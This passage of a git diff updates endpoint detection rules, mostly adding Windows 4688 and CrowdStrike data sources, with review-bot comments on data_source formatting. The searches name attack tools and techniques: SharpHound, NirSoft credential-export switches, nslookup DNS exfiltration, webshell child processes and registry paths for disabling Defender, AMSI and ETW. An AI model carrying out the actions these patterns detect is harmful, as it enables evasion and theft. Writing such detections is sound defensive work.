index 3d7c3ca93b..518c423119 100644
--- a/detections/endpoint/detect_rtlo_in_process.yml
+++ b/detections/endpoint/detect_rtlo_in_process.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies the abuse of the right-to-left ov
leading to unauthorized access, data exfiltration, or further system compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process!=unknown AND
Processes.action=allowed by Processes.dest Processes.user Processes.original_file_name
diff --git a/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml b/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml
index 12fda2f275..f8f73f69f3 100644
--- a/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml
+++ b/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of rundll32.exe loadin
network connections, and any spawned child processes for further context.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*advpack*
by Processes.dest Processes.user Processes.parent_process_name Processes.original_file_name
diff --git a/detections/endpoint/detect_rundll32_application_control_bypass___setupapi.yml b/detections/endpoint/detect_rundll32_application_control_bypass___setupapi.yml
index 9a81bf670c..9d20f58aff 100644
--- a/detections/endpoint/detect_rundll32_application_control_bypass___setupapi.yml
+++ b/detections/endpoint/detect_rundll32_application_control_bypass___setupapi.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of rundll32.exe loadin
a severe threat to system integrity and security.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*setupapi*
by Processes.dest Processes.user Processes.parent_process_name Processes.original_file_name
diff --git a/detections/endpoint/detect_rundll32_application_control_bypass___syssetup.yml b/detections/endpoint/detect_rundll32_application_control_bypass___syssetup.yml
index a0897c5b3b..721f1d0f62 100644
--- a/detections/endpoint/detect_rundll32_application_control_bypass___syssetup.yml
+++ b/detections/endpoint/detect_rundll32_application_control_bypass___syssetup.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of rundll32.exe loadin
connections, and any spawned child processes for further context.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*syssetup*
by Processes.dest Processes.user Processes.parent_process_name Processes.original_file_name
diff --git a/detections/endpoint/detect_rundll32_inline_hta_execution.yml b/detections/endpoint/detect_rundll32_inline_hta_execution.yml
index 8c8e1260ab..2e59eba9ae 100644
--- a/detections/endpoint/detect_rundll32_inline_hta_execution.yml
+++ b/detections/endpoint/detect_rundll32_inline_hta_execution.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of "rundll32.exe" with
maintain persistence within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process)
as process values(Processes.parent_process) as parent_process min(_time) as firstTime
max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32`
diff --git a/detections/endpoint/detect_sharphound_command_line_arguments.yml b/detections/endpoint/detect_sharphound_command_line_arguments.yml
index 008f499514..51d16a6f89 100644
--- a/detections/endpoint/detect_sharphound_command_line_arguments.yml
+++ b/detections/endpoint/detect_sharphound_command_line_arguments.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of SharpHound command-
compromising sensitive information and critical systems.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*-collectionMethod*","*invoke-bloodhound*")
by Processes.dest Processes.user Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/detect_sharphound_usage.yml b/detections/endpoint/detect_sharphound_usage.yml
index 86389105f7..cf04812b7a 100644
--- a/detections/endpoint/detect_sharphound_usage.yml
+++ b/detections/endpoint/detect_sharphound_usage.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the usage of the SharpHound binary b
and lateral movement within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=sharphound.exe
OR Processes.original_file_name=SharpHound.exe) by Processes.dest Processes.user
diff --git a/detections/endpoint/detect_suspicious_processnames_using_pretrained_model_in_dsdl.yml b/detections/endpoint/detect_suspicious_processnames_using_pretrained_model_in_dsdl.yml
index 806d34c814..1aeb9d8929 100644
--- a/detections/endpoint/detect_suspicious_processnames_using_pretrained_model_in_dsdl.yml
+++ b/detections/endpoint/detect_suspicious_processnames_using_pretrained_model_in_dsdl.yml
@@ -6,7 +6,7 @@ author: Abhinav Mishra, Kumar Sharad and Namratha Sreekanta, Splunk
type: Anomaly
status: experimental
data_source:
-- Sysmon Event Code 1
+- Sysmon EventID 1
description: The following analytic identifies suspicious process names using a pre-trained
Deep Learning model. It leverages Endpoint Detection and Response (EDR) telemetry
to analyze process names and predict their likelihood of being malicious. The model,
diff --git a/detections/endpoint/detect_use_of_cmd_exe_to_launch_script_interpreters.yml b/detections/endpoint/detect_use_of_cmd_exe_to_launch_script_interpreters.yml
index bc0e873704..2f836cb956 100644
--- a/detections/endpoint/detect_use_of_cmd_exe_to_launch_script_interpreters.yml
+++ b/detections/endpoint/detect_use_of_cmd_exe_to_launch_script_interpreters.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of cscript.exe or wscr
to code execution, privilege escalation, or persistence within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name="cmd.exe"
(Processes.process_name=cscript.exe OR Processes.process_name =wscript.exe) by Processes.parent_process
diff --git a/detections/endpoint/detect_webshell_exploit_behavior.yml b/detections/endpoint/detect_webshell_exploit_behavior.yml
index aa6f4ffd68..42de72b989 100644
--- a/detections/endpoint/detect_webshell_exploit_behavior.yml
+++ b/detections/endpoint/detect_webshell_exploit_behavior.yml
@@ -16,6 +16,8 @@ description: The following analytic identifies the execution of suspicious proce
data.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count max(_time) as lastTime, min(_time)
as firstTime from datamodel=Endpoint.Processes where (Processes.process_name IN
("arp.exe","at.exe","bash.exe","bitsadmin.exe","certutil.exe","cmd.exe","cscript.exe",
diff --git a/detections/endpoint/detection_of_tools_built_by_nirsoft.yml b/detections/endpoint/detection_of_tools_built_by_nirsoft.yml
index 381540e3e4..f12a51960e 100644
--- a/detections/endpoint/detection_of_tools_built_by_nirsoft.yml
+++ b/detections/endpoint/detection_of_tools_built_by_nirsoft.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of tools built by N
of the affected system.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) values(Processes.process)
as process max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process="*
/stext *" OR Processes.process="* /scomma *" ) by Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/disable_amsi_through_registry.yml b/detections/endpoint/disable_amsi_through_registry.yml
index ee4ffdd399..ef574c1785 100644
--- a/detections/endpoint/disable_amsi_through_registry.yml
+++ b/detections/endpoint/disable_amsi_through_registry.yml
@@ -15,7 +15,7 @@ description: The following analytic detects modifications to the Windows registr
could allow attackers to execute payloads with minimal alerts, leading to potential
system compromise and data exfiltration.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows Script\\Settings\\AmsiEnable"
diff --git a/detections/endpoint/disable_defender_antivirus_registry.yml b/detections/endpoint/disable_defender_antivirus_registry.yml
index d84a2d4a21..9ed2c7f702 100644
--- a/detections/endpoint/disable_defender_antivirus_registry.yml
+++ b/detections/endpoint/disable_defender_antivirus_registry.yml
@@ -15,7 +15,7 @@ description: The following analytic detects the modification of Windows Defender
leading to potential data breaches, system compromise, and further propagation of
malware within the network.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path = "*\\Policies\\Microsoft\\Windows Defender*" Registry.registry_value_name
diff --git a/detections/endpoint/disable_defender_blockatfirstseen_feature.yml b/detections/endpoint/disable_defender_blockatfirstseen_feature.yml
index 349cb889c8..2fd43e341e 100644
--- a/detections/endpoint/disable_defender_blockatfirstseen_feature.yml
+++ b/detections/endpoint/disable_defender_blockatfirstseen_feature.yml
@@ -6,7 +6,7 @@ author: Steven Dick, Teoderick Contreras, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects the modification of the Windows registry
to disable the Windows Defender BlockAtFirstSeen feature. It leverages data from
diff --git a/detections/endpoint/disable_defender_enhanced_notification.yml b/detections/endpoint/disable_defender_enhanced_notification.yml
index 697be6ac02..060054c957 100644
--- a/detections/endpoint/disable_defender_enhanced_notification.yml
+++ b/detections/endpoint/disable_defender_enhanced_notification.yml
@@ -15,9 +15,8 @@ description: The following analytic detects the modification of the registry to
mechanisms, maintain persistence, and escalate their activities without triggering
alerts.
data_source:
-- Sysmon EventID 1
-- Sysmon EventID 12
-- Sysmon EventID 13
+- Sysmon EventID 1 AND Sysmon EventID 12
+- Sysmon EventID 1 AND Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time)
AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id
Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name
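Review bot: The new entries `Sysmon EventID 1 AND Sysmon EventID 12` and `Sysmon EventID 1 AND Sysmon EventID 13` turn data_source from a list of individual sources into free-text expressions, while every other hunk in this commit keeps one source per list item; the same compound form appears in disabling_windows_local_security_authority_defences_via_registry (`Sysmon EventID 13 AND Sysmon EventID 1`, with the operands in the opposite order) and dllhost_with_no_command_line_arguments_with_network (`Sysmon EventID 1 AND Sysmon EventID 3`). If contentctl 4.2.0, which this commit pins in the workflows, validates data_source strings against the data_sources catalog, these entries need matching catalog entries or the build will reject them; if it does not, a consistent operand order (process source first) and a comment stating the convention would help, e.g. `# compound entry: the search correlates Processes with Registry, so both sources are required`. Only the Processes leg of the search is visible in this hunk, so the Registry correlation is inferred from the metadata rather than confirmed here.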
diff --git a/detections/endpoint/disable_defender_mpengine_registry.yml b/detections/endpoint/disable_defender_mpengine_registry.yml
index 4f3093af81..f722cb1842 100644
--- a/detections/endpoint/disable_defender_mpengine_registry.yml
+++ b/detections/endpoint/disable_defender_mpengine_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the modification of the Windows Defe
and further system compromise. Immediate investigation and endpoint isolation are
recommended.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path = "*\\Policies\\Microsoft\\Windows Defender\\MpEngine*"
diff --git a/detections/endpoint/disable_defender_spynet_reporting.yml b/detections/endpoint/disable_defender_spynet_reporting.yml
index 75d4b76cdd..05b46452a9 100644
--- a/detections/endpoint/disable_defender_spynet_reporting.yml
+++ b/detections/endpoint/disable_defender_spynet_reporting.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the modification of the registry to
could enable an attacker to evade detection, maintain persistence, and carry out
further attacks without being flagged by Windows Defender.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path = "*\\Microsoft\\Windows Defender\\SpyNet*" Registry.registry_value_name
diff --git a/detections/endpoint/disable_defender_submit_samples_consent_feature.yml b/detections/endpoint/disable_defender_submit_samples_consent_feature.yml
index d1114bc616..d75edf1bfb 100644
--- a/detections/endpoint/disable_defender_submit_samples_consent_feature.yml
+++ b/detections/endpoint/disable_defender_submit_samples_consent_feature.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the modification of the Windows regi
analysis. If confirmed malicious, this could allow an attacker to execute malicious
code without being detected by Windows Defender, leading to potential system compromise.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path = "*\\Microsoft\\Windows Defender\\SpyNet*" Registry.registry_value_name
diff --git a/detections/endpoint/disable_etw_through_registry.yml b/detections/endpoint/disable_etw_through_registry.yml
index dc8513536c..4f8881e579 100644
--- a/detections/endpoint/disable_etw_through_registry.yml
+++ b/detections/endpoint/disable_etw_through_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications to the registry that d
attackers to execute payloads with minimal alerts, impairing defenses and potentially
leading to further compromise of the system.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\.NETFramework\\ETWEnabled"
diff --git a/detections/endpoint/disable_logs_using_wevtutil.yml b/detections/endpoint/disable_logs_using_wevtutil.yml
index d6d862df55..775e2ce23f 100644
--- a/detections/endpoint/disable_logs_using_wevtutil.yml
+++ b/detections/endpoint/disable_logs_using_wevtutil.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of "wevtutil.exe" with
respond effectively to the incident.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "wevtutil.exe"
Processes.process = "*sl*" Processes.process = "*/e:false*" by Processes.parent_process_name
diff --git a/detections/endpoint/disable_registry_tool.yml b/detections/endpoint/disable_registry_tool.yml
index 728f09b798..0af25ed655 100644
--- a/detections/endpoint/disable_registry_tool.yml
+++ b/detections/endpoint/disable_registry_tool.yml
@@ -15,7 +15,7 @@ description: The following analytic detects modifications to the Windows registr
could hinder incident response efforts and allow the attacker to maintain control
over the compromised system.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools"
diff --git a/detections/endpoint/disable_schedule_task.yml b/detections/endpoint/disable_schedule_task.yml
index a486a8376b..7196040a3c 100644
--- a/detections/endpoint/disable_schedule_task.yml
+++ b/detections/endpoint/disable_schedule_task.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of a command to disabl
security defenses, and further compromise the targeted host.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime
max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=schtasks.exe
Processes.process=*/change* Processes.process=*/disable* by Processes.user Processes.process_name
diff --git a/detections/endpoint/disable_security_logs_using_minint_registry.yml b/detections/endpoint/disable_security_logs_using_minint_registry.yml
index c7ef979383..7e7b26e8f2 100644
--- a/detections/endpoint/disable_security_logs_using_minint_registry.yml
+++ b/detections/endpoint/disable_security_logs_using_minint_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects a suspicious registry modification a
undetected, making it difficult to trace their actions and compromising the integrity
of security audits.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path="*\\Control\\MiniNt\\*") BY _time span=1h Registry.user
diff --git a/detections/endpoint/disable_show_hidden_files.yml b/detections/endpoint/disable_show_hidden_files.yml
index 11aa7dfb24..9a64a34bc3 100644
--- a/detections/endpoint/disable_show_hidden_files.yml
+++ b/detections/endpoint/disable_show_hidden_files.yml
@@ -13,7 +13,7 @@ description: The following analytic detects modifications to the Windows registr
behavior could allow an attacker to conceal malicious files on the system, making
it harder for security tools and analysts to identify and remove the threat.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden"
diff --git a/detections/endpoint/disable_uac_remote_restriction.yml b/detections/endpoint/disable_uac_remote_restriction.yml
index 8473e91fcd..be01d67a03 100644
--- a/detections/endpoint/disable_uac_remote_restriction.yml
+++ b/detections/endpoint/disable_uac_remote_restriction.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the modification of the registry to
escalation. If confirmed malicious, this could enable an attacker to execute unauthorized
actions with elevated privileges, compromising the security of the affected system.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path="*\\CurrentVersion\\Policies\\System*" Registry.registry_value_name="LocalAccountTokenFilterPolicy"
diff --git a/detections/endpoint/disable_windows_app_hotkeys.yml b/detections/endpoint/disable_windows_app_hotkeys.yml
index 1550c2f7dd..85e4112bf5 100644
--- a/detections/endpoint/disable_windows_app_hotkeys.yml
+++ b/detections/endpoint/disable_windows_app_hotkeys.yml
@@ -13,7 +13,7 @@ description: The following analytic detects a suspicious registry modification a
response efforts. If confirmed malicious, this technique can allow an attacker to
maintain persistence and evade detection, complicating the remediation process.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path="*\\Windows NT\\CurrentVersion\\Image File Execution
diff --git a/detections/endpoint/disable_windows_behavior_monitoring.yml b/detections/endpoint/disable_windows_behavior_monitoring.yml
index faeab8144f..6c8d9b60f5 100644
--- a/detections/endpoint/disable_windows_behavior_monitoring.yml
+++ b/detections/endpoint/disable_windows_behavior_monitoring.yml
@@ -13,7 +13,7 @@ description: The following analytic identifies modifications in the registry to
If confirmed malicious, this action could allow an attacker to execute code, escalate
privileges, or persist in the environment without being detected by antivirus software.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path= "*\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time
diff --git a/detections/endpoint/disable_windows_smartscreen_protection.yml b/detections/endpoint/disable_windows_smartscreen_protection.yml
index e56a8075bd..f4eac676b8 100644
--- a/detections/endpoint/disable_windows_smartscreen_protection.yml
+++ b/detections/endpoint/disable_windows_smartscreen_protection.yml
@@ -15,7 +15,7 @@ description: The following analytic detects modifications to the Windows registr
bypass security measures, increasing the risk of successful phishing attacks and
malware infections.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE Registry.registry_path IN ("*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SmartScreenEnabled",
diff --git a/detections/endpoint/disabling_cmd_application.yml b/detections/endpoint/disabling_cmd_application.yml
index b230da25d7..6dee1757b5 100644
--- a/detections/endpoint/disabling_cmd_application.yml
+++ b/detections/endpoint/disabling_cmd_application.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications to the registry that d
for directory and file traversal, complicating incident response and allowing the
attacker to maintain persistence.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path= "*\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\\DisableCMD"
diff --git a/detections/endpoint/disabling_controlpanel.yml b/detections/endpoint/disabling_controlpanel.yml
index d15f60dd93..19c156b161 100644
--- a/detections/endpoint/disabling_controlpanel.yml
+++ b/detections/endpoint/disabling_controlpanel.yml
@@ -15,7 +15,7 @@ description: The following analytic detects registry modifications that disable
this could allow attackers to maintain control over the infected machine and prevent
remediation efforts.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel"
diff --git a/detections/endpoint/disabling_defender_services.yml b/detections/endpoint/disabling_defender_services.yml
index 7b116079f4..2b6483c299 100644
--- a/detections/endpoint/disabling_defender_services.yml
+++ b/detections/endpoint/disabling_defender_services.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the disabling of Windows Defender se
allow attackers to execute further malicious activities undetected, leading to potential
data breaches or system compromise.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path = "*\\System\\CurrentControlSet\\Services\\*" AND
diff --git a/detections/endpoint/disabling_firewall_with_netsh.yml b/detections/endpoint/disabling_firewall_with_netsh.yml
index fc68aa3afd..bb022e6e77 100644
--- a/detections/endpoint/disabling_firewall_with_netsh.yml
+++ b/detections/endpoint/disabling_firewall_with_netsh.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the disabling of the firewall usi
compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_netsh` Processes.process=
"*firewall*" (Processes.process= "*off*" OR Processes.process= "*disable*") by
diff --git a/detections/endpoint/disabling_folderoptions_windows_feature.yml b/detections/endpoint/disabling_folderoptions_windows_feature.yml
index f02279df0b..22f362cb21 100644
--- a/detections/endpoint/disabling_folderoptions_windows_feature.yml
+++ b/detections/endpoint/disabling_folderoptions_windows_feature.yml
@@ -15,7 +15,7 @@ description: The following analytic detects the modification of the Windows regi
If confirmed malicious, this could allow an attacker to hide their presence and
malicious files, making detection and remediation more difficult.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFolderOptions"
diff --git a/detections/endpoint/disabling_net_user_account.yml b/detections/endpoint/disabling_net_user_account.yml
index cdf0c53c18..fcc5590493 100644
--- a/detections/endpoint/disabling_net_user_account.yml
+++ b/detections/endpoint/disabling_net_user_account.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of the `net.exe` utility to
attacker in maintaining control or covering their tracks.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
values(Processes.parent_process) as parent_process values(Processes.process_id)
as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/disabling_norun_windows_app.yml b/detections/endpoint/disabling_norun_windows_app.yml
index 921201e39f..2654bf65a0 100644
--- a/detections/endpoint/disabling_norun_windows_app.yml
+++ b/detections/endpoint/disabling_norun_windows_app.yml
@@ -13,7 +13,7 @@ description: The following analytic detects the modification of the Windows regi
malicious, this action could hinder system cleaning efforts and make it more difficult
to run essential tools, thereby aiding malware persistence.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun"
diff --git a/detections/endpoint/disabling_remote_user_account_control.yml b/detections/endpoint/disabling_remote_user_account_control.yml
index 0e7ef58cfc..f6ea7faffd 100644
--- a/detections/endpoint/disabling_remote_user_account_control.yml
+++ b/detections/endpoint/disabling_remote_user_account_control.yml
@@ -14,7 +14,7 @@ description: The following analytic identifies modifications to the registry key
elevated privileges, making it easier to execute further attacks or maintain persistence
within the environment.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path=*HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA*
diff --git a/detections/endpoint/disabling_systemrestore_in_registry.yml b/detections/endpoint/disabling_systemrestore_in_registry.yml
index 432a5d661b..a3cc1f29a0 100644
--- a/detections/endpoint/disabling_systemrestore_in_registry.yml
+++ b/detections/endpoint/disabling_systemrestore_in_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the modification of registry keys to
system recovery, allowing the attacker to sustain their foothold and potentially
cause further damage or data loss.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\\DisableSR"
diff --git a/detections/endpoint/disabling_task_manager.yml b/detections/endpoint/disabling_task_manager.yml
index a6493c253f..382f4a93e3 100644
--- a/detections/endpoint/disabling_task_manager.yml
+++ b/detections/endpoint/disabling_task_manager.yml
@@ -14,7 +14,7 @@ description: The following analytic identifies modifications to the Windows regi
users from terminating malicious processes. If confirmed malicious, this could allow
attackers to maintain persistence and control over the infected system.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr"
diff --git a/detections/endpoint/disabling_windows_local_security_authority_defences_via_registry.yml b/detections/endpoint/disabling_windows_local_security_authority_defences_via_registry.yml
index acf711fc4a..0903cfcc9d 100644
--- a/detections/endpoint/disabling_windows_local_security_authority_defences_via_registry.yml
+++ b/detections/endpoint/disabling_windows_local_security_authority_defences_via_registry.yml
@@ -6,7 +6,7 @@ author: Dean Luxton
status: production
type: TTP
data_source:
-- Sysmon Event ID 13
+- Sysmon EventID 13 AND Sysmon EventID 1
description: The following analytic identifies the deletion of registry keys that
disable Local Security Authority (LSA) protection and Microsoft Defender Device
Guard. It leverages data from Endpoint Detection and Response (EDR) agents, focusing
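Review bot: The description directly below the changed line says this analytic identifies the deletion of registry keys, yet the new data_source names Sysmon EventID 13, which records a registry value being set; the Sysmon event that records a registry key or value being created or deleted is EventID 12. Either the description or the data_source is inaccurate, and since the search is outside the hunk it cannot be confirmed here which one; whichever is wrong should be corrected so the metadata reflects what the search can actually observe. The operand order `Sysmon EventID 13 AND Sysmon EventID 1` also differs from the `Sysmon EventID 1 AND ...` form used elsewhere in this commit.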
diff --git a/detections/endpoint/dllhost_with_no_command_line_arguments_with_network.yml b/detections/endpoint/dllhost_with_no_command_line_arguments_with_network.yml
index 6b96a1dd98..1788a42946 100644
--- a/detections/endpoint/dllhost_with_no_command_line_arguments_with_network.yml
+++ b/detections/endpoint/dllhost_with_no_command_line_arguments_with_network.yml
@@ -14,7 +14,7 @@ description: The following analytic detects instances of DLLHost.exe running wit
to execute code, move laterally, or exfiltrate data, posing a severe threat to the
network's security.
data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 3
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Processes where Processes.process_name=dllhost.exe
Processes.action!="blocked" by host _time span=1h Processes.process_id Processes.process_name
diff --git a/detections/endpoint/dns_exfiltration_using_nslookup_app.yml b/detections/endpoint/dns_exfiltration_using_nslookup_app.yml
index 8fa692ce80..ce76b2bb3e 100644
--- a/detections/endpoint/dns_exfiltration_using_nslookup_app.yml
+++ b/detections/endpoint/dns_exfiltration_using_nslookup_app.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies potential DNS exfiltration using
to critical information.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
values(Processes.process_id) as process_id values(Processes.parent_process) as parent_process
count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/domain_account_discovery_with_dsquery.yml b/detections/endpoint/domain_account_discovery_with_dsquery.yml
index 77893e8ccf..9568e08f11 100644
--- a/detections/endpoint/domain_account_discovery_with_dsquery.yml
